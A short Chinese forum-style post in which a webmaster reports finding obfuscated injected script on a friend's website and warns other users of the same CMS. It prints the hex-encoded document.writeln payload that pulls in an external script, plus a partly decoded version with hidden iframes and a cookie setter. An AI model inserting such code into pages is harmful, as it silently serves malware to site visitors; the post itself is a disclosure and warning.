今天无意中发现我给一位朋友做的网站打开有点慢,职业病的查看了下源代码字顶部和底部分别发现了这样的代码:
<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
以前见人家挂马也是再底部,但是这种代码不认识
baidu了一下大吃一惊!
找到相关网页约785,000篇,用时0.117秒
而且绝大部分都是企业站怀疑也是良精的
打开麽个网站一看跟我的情形一样。仔细看看这个网站的代码确定是梁良精的程序。应该是良精的程序出现什么大漏洞了吧?
据落伍的高手转换后的代码如下:
document.write('<iframe height="0" frameborder="1" src="; width="10" ></iframe>');
document.write('<iframe height="0" frameborder="1" src="; width="10" ></iframe>');
document.cookie = "Cookieakxx=akxx;expires="+ Then.toGMTString() +";path=
这样看来又是框架木马了!
用量经作战的朋友赶紧看看吧!晚了被google认为是有病毒网站就有点冤枉了!
A5创业网 版权所有